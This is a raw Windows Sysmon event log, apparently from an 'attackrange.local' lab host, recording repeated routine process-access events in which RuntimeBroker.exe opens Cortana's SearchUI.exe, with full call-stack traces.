12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006922Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006921Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006920Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006919Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006918Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006917Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x80000000000000006916Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006915Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006914Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006913Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006912Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006911Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006910Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006909Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006908Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006907Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006906Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006905Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006904Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
